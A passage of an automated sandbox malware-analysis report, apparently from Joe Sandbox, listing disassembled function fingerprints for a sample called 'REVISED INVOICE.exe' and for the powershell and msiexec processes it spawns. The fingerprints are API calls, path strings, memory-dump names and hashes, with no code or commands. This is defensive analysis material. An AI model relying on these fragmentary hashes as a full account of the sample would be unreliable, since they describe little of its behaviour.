                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004059D9
                                                                                                • CharPrevW.USER32(?,00000000), ref: 004059E3
                                                                                                • lstrcatW.KERNEL32(?,00409014), ref: 004059F5
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 2659869361-4017390910
                                                                                                • Opcode ID: d7e49c6a6175e7957920a8ebfa112e8ed7db4acdde4d4b40ed7b02ca79cf1c4c
                                                                                                • Instruction ID: e27ca5b6c843e4ca6b7b7419ee0e736cc2f4fee1b15a20ddc9c218eb8b1253ea
                                                                                                • Opcode Fuzzy Hash: d7e49c6a6175e7957920a8ebfa112e8ed7db4acdde4d4b40ed7b02ca79cf1c4c
                                                                                                • Instruction Fuzzy Hash: 1DD0A761101930AAC212E7488C00DDF729CAE55345341003BF107B30B1C7781D5287FE
                                                                                                APIs
                                                                                                • DestroyWindow.USER32 ref: 00402D9D
                                                                                                • GetTickCount.KERNEL32(00000000,00402F6A,00000001,?,?,00000000,00403504,?), ref: 00402DBB
                                                                                                • CreateDialogParamW.USER32 ref: 00402DD8
                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402DE6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                • String ID:
                                                                                                • API String ID: 2102729457-0
                                                                                                • Opcode ID: 5b077e3499f9c07bbd95dc59ca3d471d91709291d8f5bd327ee9b7f2041f6974
                                                                                                • Instruction ID: e23ac89653febb243e72dcf23735aaa2031a226b5032255065ec6e4c9dbb6a99
                                                                                                • Opcode Fuzzy Hash: 5b077e3499f9c07bbd95dc59ca3d471d91709291d8f5bd327ee9b7f2041f6974
                                                                                                • Instruction Fuzzy Hash: B3F0F431909220EBC6516B54FD4C9DB7F75FB4571270149B7F001B11E4D7B95C818BAD
                                                                                                APIs
                                                                                                  • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
                                                                                                  • Part of subcall function 00405A7E: CharNextW.USER32(?), ref: 00405A8C
                                                                                                  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405A91
                                                                                                  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405AA9
                                                                                                • lstrlenW.KERNEL32(00424F10,00000000,00424F10,00424F10,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405830,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 00405B34
                                                                                                • GetFileAttributesW.KERNEL32(00424F10,00424F10,00424F10,00424F10,00424F10,00424F10,00000000,00424F10,00424F10,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405830,?,7570D4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405B44
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405ADB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 3248276644-4017390910
                                                                                                • Opcode ID: 5cd88eb9c331bd035ef3732d22fdb38d6df270911e15b1e56a74679c362f2206
                                                                                                • Instruction ID: a8deb24d6afa2735206f329f0351f59021ff10951cf48c606255c952c9ad3203
                                                                                                • Opcode Fuzzy Hash: 5cd88eb9c331bd035ef3732d22fdb38d6df270911e15b1e56a74679c362f2206
                                                                                                • Instruction Fuzzy Hash: CBF04921304E5215D622323A1C44AAF3554CFC1364705073BB861721E1CB3C9943DE7E
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(?,7570D4C4,00000000,C:\Users\user\AppData\Local\Temp\,004037AB,004035C0,?), ref: 004037ED
                                                                                                • GlobalFree.KERNEL32(?), ref: 004037F4
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004037D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$GlobalLibrary
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 1100898210-4017390910
                                                                                                • Opcode ID: b2d9a1ddbba9b9f3ee0b0ea3bd9ee1620ba51efa6b86355baead2e8ed11cdd1d
                                                                                                • Instruction ID: 66f8bddb8dfdb1964ca55d912e2b06e4102c5475863404a2afc710826c1672a2
                                                                                                • Opcode Fuzzy Hash: b2d9a1ddbba9b9f3ee0b0ea3bd9ee1620ba51efa6b86355baead2e8ed11cdd1d
                                                                                                • Instruction Fuzzy Hash: CAE0C2B39051206BC7311F04EC08B1AB7BC7F88B32F05416AE8407B3B087742C528BC9
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00405A25
                                                                                                • CharPrevW.USER32(80000000,00000000), ref: 00405A35
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrlen
                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                • API String ID: 2709904686-66916594
                                                                                                • Opcode ID: bd96f5d222dd2e219d7186a4e9023239cf4eadd8ba915765e0199ed169867e67
                                                                                                • Instruction ID: 5bbf66532c1e6c52d9ac91e78c5b81189c295a76ad9a8eb5813a93f974e07d29
                                                                                                • Opcode Fuzzy Hash: bd96f5d222dd2e219d7186a4e9023239cf4eadd8ba915765e0199ed169867e67
                                                                                                • Instruction Fuzzy Hash: 95D05EB29109209AD322A708DC419AF73ACEF113407464466F401A31A5D3785D818AAA
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B81
                                                                                                • CharNextA.USER32(00000000), ref: 00405B92
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 190613189-0
                                                                                                • Opcode ID: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
                                                                                                • Instruction ID: 1b7cebc677eab2b4d2404c83280ad7709bae0e65096c4b9ca61da70a623928b5
                                                                                                • Opcode Fuzzy Hash: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
                                                                                                • Instruction Fuzzy Hash: B9F06231504558AFC7029BA5DD40D9FBBB8EF06250B2540A9E800F7351D674FE019BA9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 125446119344294da046c6ffcaeb5ae0746660e21bc82e0974237f4ca20d8211
                                                                                                • Instruction ID: 2bd10f4a8077881412eac0b3becbf2ee10ab3f145e7dd33653b79be0b7220213
                                                                                                • Opcode Fuzzy Hash: 125446119344294da046c6ffcaeb5ae0746660e21bc82e0974237f4ca20d8211
                                                                                                • Instruction Fuzzy Hash: E8023D74A102199FDB15CF98C884A9EBBF2FF88314F24855AF805AB365C771ED91CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b4cb0a42eed39c6a589132eee9aa2c97ebf3c9239204e0238599e8b828440eec
                                                                                                • Instruction ID: 6a99eeca8cb23cb4c7733d499fa9ea7824e9dc79c7a8f2e114213538780e5921
                                                                                                • Opcode Fuzzy Hash: b4cb0a42eed39c6a589132eee9aa2c97ebf3c9239204e0238599e8b828440eec
                                                                                                • Instruction Fuzzy Hash: C2F13D74A10209AFDB05CF98D480ADDBBB2FF89314F64856AF805AB355C771ED92CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 138fae9efdb4c27525919c3e823cbde9703635344b3666e3b17ae5f7ac95173d
                                                                                                • Instruction ID: 80c39c83bc503d27fc0e19c915a38a4c5b08709c5a96e41d8e8e721fa770fbf0
                                                                                                • Opcode Fuzzy Hash: 138fae9efdb4c27525919c3e823cbde9703635344b3666e3b17ae5f7ac95173d
                                                                                                • Instruction Fuzzy Hash: 9DE14C70A10209AFCB05CF98D484A9DFBF2FF88320F65855AE804AB365C771ED91CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ffc3c7f2ca1e42594a78f2f9370a2e7b36702b34426eb55eae99eb360d7d84e8
                                                                                                • Instruction ID: 3a7ecaacc6b548c6bb115a3f4d84bd432f040374ba2909d7c78cd02eb9bb624c
                                                                                                • Opcode Fuzzy Hash: ffc3c7f2ca1e42594a78f2f9370a2e7b36702b34426eb55eae99eb360d7d84e8
                                                                                                • Instruction Fuzzy Hash: 37819070A093858FCB06CF68C8906D9BFB1FF46310B19819BE540EB3A2D3359C52CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0e3e2bee67a4b4fd1ec93df6e3bddf17ab546ca36d5b814f031d227fe8657ae0
                                                                                                • Instruction ID: 204d0e9edbe2bd6ac44c5fc4edb53bb5a84072d5e7fb99638d7932b359124abc
                                                                                                • Opcode Fuzzy Hash: 0e3e2bee67a4b4fd1ec93df6e3bddf17ab546ca36d5b814f031d227fe8657ae0
                                                                                                • Instruction Fuzzy Hash: F141FC74A106059FCB15CF9CC884AAEBBF2FF88310F648259E915A73A5D735EC91CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 64886b6ed16027c7eb70deff9c69a5f78d56fe22a0eb9606557494dc77859b32
                                                                                                • Instruction ID: b482791aa11dee717fb27cf03c06976ba59e042e67c3a7d81592a9bca8218b73
                                                                                                • Opcode Fuzzy Hash: 64886b6ed16027c7eb70deff9c69a5f78d56fe22a0eb9606557494dc77859b32
                                                                                                • Instruction Fuzzy Hash: 3F310675A006069FCB14CF88C980AAEFBF2FF88310B658299E919A7755C771ED51CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480183116.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_27d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dcf704ae95e0ac2d32d6a3888de0a503e0cda237c089da0708d43b30d31faede
                                                                                                • Instruction ID: 34d155adeff5050d2880a69233303f62004cc4bdae4d17abf68eb0cdc4da8df1
                                                                                                • Opcode Fuzzy Hash: dcf704ae95e0ac2d32d6a3888de0a503e0cda237c089da0708d43b30d31faede
                                                                                                • Instruction Fuzzy Hash: 3121E5B1514201EFDF15CF14D9C0B26BF65EB88324F24C9A9E9094A256C336D866CBB1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480183116.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_27d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 83aee6eae617b757139e57b205b5b986050a0917db128b2ff60648e8a4d51f7d
                                                                                                • Instruction ID: c9ef5931f714672d672901042d36b1b64a580895f748bc72f4ce5246680dee91
                                                                                                • Opcode Fuzzy Hash: 83aee6eae617b757139e57b205b5b986050a0917db128b2ff60648e8a4d51f7d
                                                                                                • Instruction Fuzzy Hash: 1F219075504241DFDF06CF14D9C4B16BF72FB48314F24C9A9D9094A256C336D86ACFA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480183116.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_27d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 63dc5d6e0b041ab3cb963494a3613bdcf946cfdadfdc0b4eaa390c0973f89609
                                                                                                • Instruction ID: e0aef2f5c3518eadfc1ac1aaf75d2352d062452c2a83c6469efc5dcf44ae436d
                                                                                                • Opcode Fuzzy Hash: 63dc5d6e0b041ab3cb963494a3613bdcf946cfdadfdc0b4eaa390c0973f89609
                                                                                                • Instruction Fuzzy Hash: 8A01296140E3C09FD7128B258894B62BFB4EF53324F1DC0DBD8888F2A7C2699849C772
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480183116.000000000027D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0027D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_27d000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6494e315e6653e383eb866c7aafcc7171caaacb0d36effaaac4f19a0fefc505c
                                                                                                • Instruction ID: 6f554d8b8a31a8dd3819ff48065e8fd303a695c280c00ecd8d493654f5762da1
                                                                                                • Opcode Fuzzy Hash: 6494e315e6653e383eb866c7aafcc7171caaacb0d36effaaac4f19a0fefc505c
                                                                                                • Instruction Fuzzy Hash: 2501A271518341AAE7204E29C8C4B66BFE8EF41724F28D45AEC4D4B286C6B9D855CAB1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
• Opcode ID: 300e0995a96e8db1896664ec84698d9591637c5d9571e583985b9ed6c5677066
• Instruction ID: fb717847100dc13c61a19e75d3f85c7899fe6958a23cdc5f1d53026132a5b07b
• Opcode Fuzzy Hash: 300e0995a96e8db1896664ec84698d9591637c5d9571e583985b9ed6c5677066
• Instruction Fuzzy Hash: 9EF0BB31A00105DFCB14CF98DC459AEF771FFC8320B648659D955A7654CF35AC52CB50
Memory Dump Source
• Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e790f450d8e8442c366652ca908e1e5b215d25be8af20af5660e3f7e6363138
• Instruction ID: 103da781b15f56d99dfdcde64ffe42cb78b63ebce54df0857af012999ccad550
• Opcode Fuzzy Hash: 3e790f450d8e8442c366652ca908e1e5b215d25be8af20af5660e3f7e6363138
• Instruction Fuzzy Hash: 29F0FF31A00115AFCB059B88D9409ADFBB6FF88320B644119E914A3264CB72AD22CB50
Memory Dump Source
• Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 64f198567e31764653a4f26abe4d833d7ad0dc5915d26fb4e0a2169dbb5cac71
• Instruction ID: a64009bea87a3d7df38dcb66e596f0c625fad15362fb983e8c55a4d52eff88e6
• Opcode Fuzzy Hash: 64f198567e31764653a4f26abe4d833d7ad0dc5915d26fb4e0a2169dbb5cac71
• Instruction Fuzzy Hash: 7FE09AB0D01108EFE780DF6884804ADFFF0EB48214B68C5BEC809D3222E7358A17CB80
Memory Dump Source
• Source File: 00000003.00000002.480219480.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
• Instruction ID: 91f4895e476e863509be7bad44311633acab322c40535bf0b3988318c2bcf4d7
• Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
• Instruction Fuzzy Hash: C6D067B0D142199F8780EFADC94156EFBF4EB48200F6485AA8919E7301E7729A529BD1
Strings
Memory Dump Source
• Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
Similarity
• API ID:
• String ID: PHp$PHp$[!T<
• API String ID: 0-4268876136
• Opcode ID: 588f2fcaee543c7b4de7be41182b3c98c287cdf6085c5683133a6783371b629d
• Instruction ID: ddedce951b200b2dc747ddbf75e4c166259a466241534ce6610d4d7b92acc9c4
• Opcode Fuzzy Hash: 588f2fcaee543c7b4de7be41182b3c98c287cdf6085c5683133a6783371b629d
• Instruction Fuzzy Hash: 7581D674E00258CFDB58DFA9D884A9DBBF2BF99300F54C069E419AB365DB349A45CF20
Strings
Memory Dump Source
• Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
Similarity
• API ID:
• String ID: PHp$PHp
• API String ID: 0-4032155144
• Opcode ID: 229b8bf1e596606ffb767bd0fdf7ad1898d71fb03f65de67331d413d23d5df4d
• Instruction ID: 0088c7be92bf98991833328253d9b5d30681dc2e9b896457b2a98621ce5581a4
• Opcode Fuzzy Hash: 229b8bf1e596606ffb767bd0fdf7ad1898d71fb03f65de67331d413d23d5df4d
• Instruction Fuzzy Hash: FB81D874E00258CFDB58DFAAD984A9DBBF2BF89304F14C069E819AB355DB349945CF20
Strings
Memory Dump Source
• Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
Similarity
• API ID:
• String ID: PHp$PHp
• API String ID: 0-4032155144
• Opcode ID: 254d5dd62f5c3aa91844d6187c81c68b114b16d50bda69caaec809148127aa06
• Instruction ID: 8d34d2aece8869675888e9136a7a1e15e8052c613034f7f4f50a821260efea32
• Opcode Fuzzy Hash: 254d5dd62f5c3aa91844d6187c81c68b114b16d50bda69caaec809148127aa06
• Instruction Fuzzy Hash: 8481C874E01218CFDB58DFAAD884A9EBBF2BF89304F14D069E409AB355DB345945CF20
Strings
Memory Dump Source
• Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
Similarity
• API ID:
• String ID: PHp$PHp
• API String ID: 0-4032155144
• Opcode ID: e02f7d71bc133509c7b3de18c8a8125d636d4b84ca326503814089f9f1414378
• Instruction ID: cd71799c3f2e637deb85fa76699e9e3e3d0c097ea4df742d4e0c207391e1522e
• Opcode Fuzzy Hash: e02f7d71bc133509c7b3de18c8a8125d636d4b84ca326503814089f9f1414378
• Instruction Fuzzy Hash: DE81C474E00218CFDB48DFA9D884A9DBBF2BF98300F54C06AE819AB355DB309945CF20
Strings
Memory Dump Source
• Source File: 00000005.00000002.628709901.00000000214B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 214B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_214b0000_msiexec.jbxd
Similarity
• API ID:
• String ID: PHp$PHp
• API String ID: 0-4032155144
• Opcode ID: 4462a6ab5645dd8375dada62b044b746d9b65dc30241576f34de16001affe1cc
• Instruction ID: a87de946ade228527bf50547ace6a8fb92a50db5f38108ad94ad0c4ed700e86f
• Opcode Fuzzy Hash: 4462a6ab5645dd8375dada62b044b746d9b65dc30241576f34de16001affe1cc
• Instruction Fuzzy Hash: 4B81D774E00218CFDB58DFA9D884A9DBBF2BF89304F14C069E819AB365DB349945CF20
Memory Dump Source
• Source File: 00000005.00000002.628741594.0000000021580000.00000040.00000800.00020000.00000000.sdmp, Offset: 21580000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_21580000_msiexec.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
